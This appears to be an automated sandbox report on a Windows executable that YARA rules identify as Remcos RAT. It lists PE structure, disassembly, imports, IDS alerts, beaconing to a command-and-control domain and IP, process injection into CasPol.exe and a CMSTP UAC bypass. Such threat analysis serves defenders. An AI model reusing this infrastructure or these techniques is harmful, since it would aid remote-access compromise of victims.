                          TLSH:E5C5C015E3E802A5D47BD630CE699733D3B1B8591734D68B0A4DD6862FB3A918B3F312
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`...$n.K$n.K$n.K...J-n.K...J(n.K...J.n.K-.*K*n.Ko..J-n.K$n.K.n.K...J/n.K...J`n.K$n.K%n.K7..J%n.K7.FK%n.K7..J%n.KRich$n.K.......

                          File Icon

                          Icon Hash:00928e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0x140068ec0
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x140000000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66A2D06D [Thu Jul 25 22:23:41 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:0
                          File Version Major:6
                          File Version Minor:0
                          Subsystem Version Major:6
                          Subsystem Version Minor:0
                          Import Hash:fa79c8f1c618648f2275daa90f4c6120

                          Entrypoint Preview

                          Instruction
                          dec eax
                          sub esp, 28h
                          call 00007F616CDCF758h
                          dec eax
                          add esp, 28h
                          jmp 00007F616CDCEF37h
                          int3
                          int3
                          inc eax
                          push ebx
                          dec eax
                          sub esp, 20h
                          dec eax
                          mov ebx, ecx
                          jmp 00007F616CDCF0D1h
                          dec eax
                          mov ecx, ebx
                          call 00007F616CDD68B1h
                          test eax, eax
                          je 00007F616CDCF0D5h
                          dec eax
                          mov ecx, ebx
                          call 00007F616CDCEDE7h
                          dec eax
                          test eax, eax
                          je 00007F616CDCF0A9h
                          dec eax
                          add esp, 20h
                          pop ebx
                          ret
                          dec eax
                          cmp ebx, FFFFFFFFh
                          je 00007F616CDCF0C8h
                          call 00007F616CDCFBE8h
                          int3
                          call 00007F616CDCFC02h
                          int3
                          jmp 00007F616CDCFC30h
                          int3
                          int3
                          int3
                          jmp 00007F616CDCF178h
                          int3
                          int3
                          int3
                          dec eax
                          sub esp, 28h
                          dec ebp
                          mov eax, dword ptr [ecx+38h]
                          dec eax
                          mov ecx, edx
                          dec ecx
                          mov edx, ecx
                          call 00007F616CDCF0D2h
                          mov eax, 00000001h
                          dec eax
                          add esp, 28h
                          ret
                          int3
                          int3
                          int3
                          inc eax
                          push ebx
                          inc ebp
                          mov ebx, dword ptr [eax]
                          dec eax
                          mov ebx, edx
                          inc ecx
                          and ebx, FFFFFFF8h
                          dec esp
                          mov ecx, ecx
                          inc ecx
                          test byte ptr [eax], 00000004h
                          dec esp
                          mov edx, ecx
                          je 00007F616CDCF0D5h
                          inc ecx
                          mov eax, dword ptr [eax+08h]
                          dec ebp
                          arpl word ptr [eax+04h], dx
                          neg eax
                          dec esp
                          add edx, ecx
                          dec eax
                          arpl ax, cx
                          dec esp
                          and edx, ecx
                          dec ecx
                          arpl bx, ax
                          dec edx
                          mov edx, dword ptr [eax+edx]
                          dec eax
                          mov eax, dword ptr [ebx+10h]
                          mov ecx, dword ptr [eax+08h]
                          dec eax
                          mov eax, dword ptr [ebx+08h]
                          test byte ptr [ecx+eax+03h], 0000000Fh
                          je 00007F616CDCF0CDh
                          movzx eax, byte ptr [ecx+eax+00h]

                          Rich Headers

                          Programming Language:
                          • [IMP] VS2008 SP1 build 30729

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x25ddf00x58.rdata
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x25de480xdc.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2830000x793a0.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x26f0000x138d8.pdata
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2fd0000x63c.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x22fd500x54.rdata
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x22ff800x28.rdata
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x22fc100x140.rdata
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x19b0000x730.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x710680x71200705ee70f681712f037648f64f7ff349bFalse0.45604713397790053data6.628875011573696IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .managed0x730000xc71b80xc72001a9720d8f2052361ee72792911e2998cFalse0.4527093632297552data6.455888936505785IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          hydrated0x13b0000x5f7600x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rdata0x19b0000xc48260xc4a00de8c4f61c1eab85a14c0763f552e6870False0.46696946519389704data6.832386028543998IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x2600000xe9100x22008fd33c392153ba6b562bd43642981136False0.24126838235294118data3.707086596297386IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .pdata0x26f0000x138d80x13a00085ea66cfd1057997a6929925deeaa33False0.488953025477707data6.138192127218323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .rsrc0x2830000x793a00x79400e02bb51fe05dba7eb1ae6d6db1fec95cFalse0.9982945393041237data7.999346124339988IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x2fd0000x63c0x800cca946f892ab4486af2246e58222b961False0.4814453125data4.783243091845513IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          BINARY0x2831180x78c84data1.0003254339793501
                          RT_VERSION0x2fbd9c0x418data0.3234732824427481
                          RT_MANIFEST0x2fc1b40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                          Imports

                          DLLImport
                          ADVAPI32.dllRegCloseKey, RegEnumValueW, RegOpenKeyExW, RegQueryValueExW, RegCreateKeyExW, RegDeleteKeyExW, RegDeleteValueW, RegEnumKeyExW, RegFlushKey, RegQueryInfoKeyW, RegSetValueExW, CreateWellKnownSid, GetWindowsAccountDomainSid, LookupPrivilegeValueW, RevertToSelf, OpenThreadToken, OpenProcessToken, SetThreadToken, AdjustTokenPrivileges, DuplicateTokenEx, GetSecurityDescriptorLength, EventWrite, EventRegister, EventEnabled
                          bcrypt.dllBCryptGenRandom, BCryptEncrypt, BCryptDecrypt, BCryptImportKey, BCryptOpenAlgorithmProvider, BCryptCloseAlgorithmProvider, BCryptDestroyKey, BCryptSetProperty
                          KERNEL32.dllTlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, RaiseException, RtlPcToFileHeader, CloseThreadpoolIo, GetStdHandle, FileTimeToSystemTime, SystemTimeToFileTime, GetSystemTime, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, ResolveLocaleName, FindStringOrdinal, GetTickCount64, GetCurrentProcess, GetCurrentThread, Sleep, InitializeCriticalSection, InitializeConditionVariable, DeleteCriticalSection, LocalFree, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, QueryPerformanceCounter, WaitForMultipleObjectsEx, GetLastError, QueryPerformanceFrequency, SetLastError, GetFullPathNameW, GetLongPathNameW, MultiByteToWideChar, WideCharToMultiByte, LocalAlloc, GetConsoleOutputCP, GetProcAddress, RaiseFailFastException, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CopyFileExW, CreateFileW, DeleteFileW, DeviceIoControl, ExpandEnvironmentStringsW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetFileAttributesExW, GetFileInformationByHandleEx, GetFileType, GetModuleFileNameW, GetOverlappedResult, LoadLibraryExW, ReadFile, SetFileInformationByHandle, SetThreadErrorMode, WriteFile, GetCurrentProcessorNumberEx, CloseHandle, SetEvent, ResetEvent, CreateEventExW, GetEnvironmentVariableW, FormatMessageW, DuplicateHandle, GetThreadPriority, SetThreadPriority, CreateProcessA, GetConsoleWindow, GetModuleHandleA, FreeConsole, AllocConsole, CreateProcessW, GetThreadContext, ExitProcess, FlushProcessWriteBuffers, GetCurrentThreadId, WaitForSingleObjectEx, VirtualQuery, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, TerminateProcess, SwitchToThread, CreateThread, SuspendThread, ResumeThread, SetThreadContext, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, InitializeSListHead, GetCurrentProcessId
                          ole32.dllCoUninitialize, CoTaskMemAlloc, CoGetApartmentType, CoCreateGuid, CoTaskMemFree, CoWaitForMultipleHandles, CoInitializeEx
                          api-ms-win-crt-math-l1-1-0.dll__setusermatherr, ceil
                          api-ms-win-crt-heap-l1-1-0.dllcalloc, free, _callnewh, _set_new_mode, malloc
                          api-ms-win-crt-string-l1-1-0.dllwcsncmp, strncpy_s, _stricmp, strcpy_s, strcmp, _wcsicmp
                          api-ms-win-crt-runtime-l1-1-0.dll_c_exit, _register_thread_local_exe_atexit_callback, _get_initial_wide_environment, _cexit, __p___wargv, __p___argc, _exit, exit, _initterm_e, _initterm, terminate, _crt_atexit, _initialize_wide_environment, _register_onexit_function, _initialize_onexit_table, _configure_wide_argv, _set_app_type, _seh_filter_exe, abort
                          api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsprintf_s, __stdio_common_vsscanf, __stdio_common_vfprintf, __acrt_iob_func, _set_fmode, __p__commode
                          api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                          Exports

                          NameOrdinalAddress
                          DotNetRuntimeDebugHeader10x140261360

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                          2024-07-26T10:38:04.959198+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection497012558192.168.2.723.95.60.82
                          2024-07-26T10:39:05.833265+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434970840.68.123.157192.168.2.7
                          2024-07-26T10:38:06.927784+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa4970280192.168.2.7178.237.33.50
                          2024-07-26T10:38:24.330685+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434970340.68.123.157192.168.2.7

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jul 26, 2024 10:38:04.295787096 CEST497012558192.168.2.723.95.60.82
                          Jul 26, 2024 10:38:04.324446917 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:38:04.324512005 CEST497012558192.168.2.723.95.60.82
                          Jul 26, 2024 10:38:04.330125093 CEST497012558192.168.2.723.95.60.82
                          Jul 26, 2024 10:38:04.344060898 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:38:04.914554119 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:38:04.959197998 CEST497012558192.168.2.723.95.60.82
                          Jul 26, 2024 10:38:05.064799070 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:38:05.071976900 CEST497012558192.168.2.723.95.60.82
                          Jul 26, 2024 10:38:05.076947927 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:38:05.077085018 CEST497012558192.168.2.723.95.60.82
                          Jul 26, 2024 10:38:05.082032919 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:38:05.662302017 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:38:05.664174080 CEST497012558192.168.2.723.95.60.82
                          Jul 26, 2024 10:38:05.669218063 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:38:05.771567106 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:38:05.818789959 CEST497012558192.168.2.723.95.60.82
                          Jul 26, 2024 10:38:06.256460905 CEST4970280192.168.2.7178.237.33.50
                          Jul 26, 2024 10:38:06.261322975 CEST8049702178.237.33.50192.168.2.7
                          Jul 26, 2024 10:38:06.261420965 CEST4970280192.168.2.7178.237.33.50
                          Jul 26, 2024 10:38:06.261507988 CEST4970280192.168.2.7178.237.33.50
                          Jul 26, 2024 10:38:06.266562939 CEST8049702178.237.33.50192.168.2.7
                          Jul 26, 2024 10:38:06.927666903 CEST8049702178.237.33.50192.168.2.7
                          Jul 26, 2024 10:38:06.927783966 CEST4970280192.168.2.7178.237.33.50
                          Jul 26, 2024 10:38:06.938546896 CEST497012558192.168.2.723.95.60.82
                          Jul 26, 2024 10:38:06.945745945 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:38:07.925093889 CEST8049702178.237.33.50192.168.2.7
                          Jul 26, 2024 10:38:07.927594900 CEST4970280192.168.2.7178.237.33.50
                          Jul 26, 2024 10:38:19.502728939 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:38:19.504661083 CEST497012558192.168.2.723.95.60.82
                          Jul 26, 2024 10:38:19.512032986 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:38:49.565458059 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:38:49.567097902 CEST497012558192.168.2.723.95.60.82
                          Jul 26, 2024 10:38:49.571912050 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:39:19.749835014 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:39:19.750948906 CEST497012558192.168.2.723.95.60.82
                          Jul 26, 2024 10:39:19.756258965 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:39:49.851797104 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:39:49.853112936 CEST497012558192.168.2.723.95.60.82
                          Jul 26, 2024 10:39:49.858033895 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:39:56.225440025 CEST4970280192.168.2.7178.237.33.50
                          Jul 26, 2024 10:39:56.537743092 CEST4970280192.168.2.7178.237.33.50
                          Jul 26, 2024 10:39:57.147099972 CEST4970280192.168.2.7178.237.33.50
                          Jul 26, 2024 10:39:58.350250006 CEST4970280192.168.2.7178.237.33.50
                          Jul 26, 2024 10:40:00.756477118 CEST4970280192.168.2.7178.237.33.50
                          Jul 26, 2024 10:40:05.568985939 CEST4970280192.168.2.7178.237.33.50
                          Jul 26, 2024 10:40:15.180311918 CEST4970280192.168.2.7178.237.33.50
                          Jul 26, 2024 10:40:19.942975044 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:40:19.944127083 CEST497012558192.168.2.723.95.60.82
                          Jul 26, 2024 10:40:19.949577093 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:40:50.054472923 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:40:50.066587925 CEST497012558192.168.2.723.95.60.82
                          Jul 26, 2024 10:40:50.072283983 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:41:20.165333033 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:41:20.168723106 CEST497012558192.168.2.723.95.60.82
                          Jul 26, 2024 10:41:20.173887014 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:41:50.251811028 CEST25584970123.95.60.82192.168.2.7
                          Jul 26, 2024 10:41:50.254616976 CEST497012558192.168.2.723.95.60.82
                          Jul 26, 2024 10:41:50.259581089 CEST25584970123.95.60.82192.168.2.7

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jul 26, 2024 10:38:03.938909054 CEST4937753192.168.2.71.1.1.1
                          Jul 26, 2024 10:38:04.290848017 CEST53493771.1.1.1192.168.2.7
                          Jul 26, 2024 10:38:06.241657019 CEST5860453192.168.2.71.1.1.1
                          Jul 26, 2024 10:38:06.252604008 CEST53586041.1.1.1192.168.2.7

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jul 26, 2024 10:38:03.938909054 CEST192.168.2.71.1.1.10xac79Standard query (0)unifrieghtmovers.comA (IP address)IN (0x0001)false
                          Jul 26, 2024 10:38:06.241657019 CEST192.168.2.71.1.1.10x2bd1Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jul 26, 2024 10:38:04.290848017 CEST1.1.1.1192.168.2.70xac79No error (0)unifrieghtmovers.com23.95.60.82A (IP address)IN (0x0001)false
                          Jul 26, 2024 10:38:06.252604008 CEST1.1.1.1192.168.2.70x2bd1No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • geoplugin.net

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.749702178.237.33.50806780C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                          TimestampBytes transferredDirectionData
                          Jul 26, 2024 10:38:06.261507988 CEST71OUTGET /json.gp HTTP/1.1
                          Host: geoplugin.net
                          Cache-Control: no-cache
                          Jul 26, 2024 10:38:06.927666903 CEST1170INHTTP/1.1 200 OK
                          date: Fri, 26 Jul 2024 08:38:06 GMT
                          server: Apache
                          content-length: 962
                          content-type: application/json; charset=utf-8
                          cache-control: public, max-age=300
                          access-control-allow-origin: *
                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                          Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:1
                          Start time:04:38:02
                          Start date:26/07/2024
                          Path:C:\Users\user\Desktop\C1ZsNxSer8.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\C1ZsNxSer8.exe"
                          Imagebase:0x7ff774a00000
                          File size:2'673'152 bytes
                          MD5 hash:4FB3E6E7B8F9C12CD2D5E161F7B94760
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:2
                          Start time:04:38:02
                          Start date:26/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff75da10000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:6
                          Start time:04:38:02
                          Start date:26/07/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                          Imagebase:0x8c0000
                          File size:108'664 bytes
                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high
                          Has exited:false

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:6.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:25.7%
                            Total number of Nodes:914
                            Total number of Limit Nodes:28
                            execution_graph 16178 7ff774a1b118 16179 7ff774a1b11d 16178->16179 16180 7ff774a1b170 16178->16180 16196 7ff774a3e8f0 16179->16196 16188 7ff774a2d950 16180->16188 16183 7ff774a1b21a 16184 7ff774a1b245 16183->16184 16204 7ff774a31840 16183->16204 16208 7ff774a22680 16184->16208 16187 7ff774a1b2b0 16189 7ff774a2d966 16188->16189 16190 7ff774a2da00 16189->16190 16191 7ff774a0e020 4 API calls 16189->16191 16194 7ff774a2d997 16189->16194 16213 7ff774a404d0 16190->16213 16191->16190 16194->16179 16195 7ff774a0e020 4 API calls 16195->16194 16197 7ff774a3e909 16196->16197 16198 7ff774a3e919 16196->16198 16197->16183 16199 7ff774a3ea4b SwitchToThread 16198->16199 16200 7ff774a3e969 SwitchToThread 16198->16200 16201 7ff774a3ea57 16198->16201 16202 7ff774a3ea07 SwitchToThread 16198->16202 16203 7ff774a3ea1c SwitchToThread 16198->16203 16199->16198 16200->16198 16201->16183 16202->16198 16203->16198 16205 7ff774a3185f 16204->16205 16207 7ff774a318ca _swprintf_c_l 16204->16207 16205->16207 16224 7ff774a12bd0 VirtualAlloc 16205->16224 16207->16184 16209 7ff774a31840 2 API calls 16208->16209 16210 7ff774a226b5 _swprintf_c_l 16209->16210 16211 7ff774a3e8f0 4 API calls 16210->16211 16212 7ff774a22805 16211->16212 16212->16187 16212->16212 16214 7ff774a40509 EnterCriticalSection 16213->16214 16220 7ff774a40595 16213->16220 16217 7ff774a40529 LeaveCriticalSection 16214->16217 16215 7ff774a12930 3 API calls 16219 7ff774a405c6 16215->16219 16217->16220 16218 7ff774a2da29 16218->16194 16218->16195 16219->16218 16221 7ff774a405d7 EnterCriticalSection 16219->16221 16220->16215 16220->16218 16222 7ff774a405fd LeaveCriticalSection 16221->16222 16223 7ff774a405f6 16221->16223 16222->16218 16223->16222 16225 7ff774a12c0b 16224->16225 16226 7ff774a12c1c 16224->16226 16225->16226 16227 7ff774a12c10 VirtualUnlock 16225->16227 16226->16207 16227->16226 16228 7ff774a1df5b 16232 7ff774a3ea80 16228->16232 16230 7ff774a1df33 16230->16230 16231 7ff774a3ea80 6 API calls 16230->16231 16231->16230 16235 7ff774a1abf0 16232->16235 16234 7ff774a3eab8 16234->16230 16236 7ff774a1ac47 16235->16236 16237 7ff774a1affa 16236->16237 16238 7ff774a3e8f0 4 API calls 16236->16238 16237->16234 16242 7ff774a1ad45 _swprintf_c_l 16238->16242 16239 7ff774a31840 2 API calls 16240 7ff774a1af31 16239->16240 16240->16237 16241 7ff774a22680 6 API calls 16240->16241 16241->16237 16242->16239 16242->16240 15529 7ff774a06620 15537 7ff774a06645 15529->15537 15530 7ff774a06659 15531 7ff774a0671f 15532 7ff774a06726 15531->15532 15533 7ff774a0673f 15531->15533 15551 7ff774a0b220 15532->15551 15538 7ff774a0676f 15533->15538 15554 7ff774a063b0 GetLastError 15533->15554 15534 7ff774a06706 15545 7ff774a04c30 15534->15545 15537->15530 15537->15531 15537->15534 15540 7ff774a066c8 15537->15540 15541 7ff774a066e7 15537->15541 15539 7ff774a06732 RaiseFailFastException 15539->15533 15543 7ff774a066d0 Sleep 15540->15543 15541->15534 15544 7ff774a066f9 RaiseFailFastException 15541->15544 15543->15541 15543->15543 15544->15534 15546 7ff774a04c56 15545->15546 15550 7ff774a04c74 15546->15550 15557 7ff774a0acc0 FlsGetValue 15546->15557 15548 7ff774a04c6c 15549 7ff774a05920 6 API calls 15548->15549 15549->15550 15550->15531 15552 7ff774a0b234 15551->15552 15552->15552 15553 7ff774a0b23d GetStdHandle WriteFile 15552->15553 15553->15539 15555 7ff774a063e0 15554->15555 15556 7ff774a06406 SetLastError 15555->15556 15558 7ff774a0ace8 FlsSetValue 15557->15558 15559 7ff774a0acda RaiseFailFastException 15557->15559 15559->15558 15560 7ff774a05760 15590 7ff774a0b020 FlsAlloc 15560->15590 15562 7ff774a058ce 15563 7ff774a0576b 15563->15562 15603 7ff774a0aec0 GetModuleHandleExW 15563->15603 15565 7ff774a0578b 15604 7ff774a07110 15565->15604 15567 7ff774a05793 15567->15562 15612 7ff774a0b750 15567->15612 15571 7ff774a057b0 15571->15562 15572 7ff774a057d8 RtlAddVectoredExceptionHandler 15571->15572 15573 7ff774a057f1 15572->15573 15574 